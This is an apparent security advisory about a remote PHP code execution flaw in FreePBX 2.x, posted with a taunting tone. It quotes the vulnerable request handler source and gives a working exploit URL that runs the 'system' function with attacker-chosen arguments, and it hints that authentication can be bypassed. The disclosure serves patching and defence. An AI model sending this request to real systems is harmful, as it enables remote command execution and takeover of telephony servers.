FreePBX 2.x Code Execution

2014.02.12
Credit: i-Hmx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

App : Freepbx 2.x download : schmoozecom.com Author : i-Hmx mail : n0p1337@gmail.com Home : sec4ever.com , secarrays ltd Freepbx is famous asterisk based distro used world wide , it suffer from many vulns actually simple one is included here just as a "knock knock" for the "schmoozecom" team ;) Here you will see damn obvious PHP code Execution vuln , which can be upgraded to RCE and also dump all box's data You can have a look if you are interested File : admin/libraries/view.functions.php function fileRequestHandler($handler, $module = false, $file = false){ global $amp_conf; switch ($handler) { case 'reload': // AJAX handler for reload event $response = do_reload(); header("Content-type: application/json"); echo json_encode($response); break; case 'file': /** Handler to pass-through file requests * Looks for "module" and "file" variables, strips .. and only allows normal filename characters. * Accepts only files of the type listed in $allowed_exts below, and sends the corresponding mime-type, * and always interprets files through the PHP interpreter. (Most of?) the freepbx environment is available, * including $db and $astman, and the user is authenticated. */ if (!$module || !$file) { die_freepbx("unknown"); } //TODO: this could probably be more efficient $module = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$module)); $file = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$file)); $allowed_exts = array( '.js' => 'text/javascript', '.js.php' => 'text/javascript', '.css' => 'text/css', '.css.php' => 'text/css', '.html.php' => 'text/html', '.php' => 'text/html', '.jpg.php' => 'image/jpeg', '.jpeg.php' => 'image/jpeg', '.png.php' => 'image/png', '.gif.php' => 'image/gif', ); foreach ($allowed_exts as $ext=>$mimetype) { if (substr($file, -1*strlen($ext)) == $ext) { $fullpath = 'modules/'.$module.'/'.$file; if (file_exists($fullpath)) { // file exists, and is allowed extension // image, css, js types - set Expires to 24hrs in advance so the client does // not keep checking for them. Replace from header.php if (!$amp_conf['DEVEL']) { header('Expires: '.gmdate('D, d M Y H:i:s', time() + 86400).' GMT', true); header('Cache-Control: max-age=86400, public, must-revalidate',true); } header("Content-type: ".$mimetype); ob_start(); include($fullpath); ob_end_flush(); exit(); } break; } } die_freepbx("../view/not allowed"); break; case 'api': if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) { $function = $_REQUEST['function']; $args = isset($_REQUEST['args'])?$_REQUEST['args']:''; //currently works for one arg functions, eventually need to clean this up to except more args $result = $function($args); $jr = json_encode($result); } else { $jr = json_encode(null); } header("Content-type: application/json"); echo $jr; break; } exit(); } Function is called at admin/config.php at line 132 if (!in_array($display, array('noauth', 'badrefer')) && isset($_REQUEST['handler']) ) { $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : ''; $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : ''; fileRequestHandler($_REQUEST['handler'], $module, $file); exit(); } Well , it's easy to be exploitd to get any php function executed eg. system config.php?handler=api&function=system&args=id usually it require authentication , but using your mind you can get around it smoothly ;) that's it Sollution? of course i would never leave you @ sec nightmares , just modify your firewall Rules and don't make your box exposed to the nasty internet world :D can you sleep well now? of course not , you may be already compromised and also backdoored with super tiny php backdoor , so you'd better to remove all php data, download latest upgrade from schmoozecom , reboot your box and you are safe . . (Temporary) ;) Have a good day ./Faris <The Awsome>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top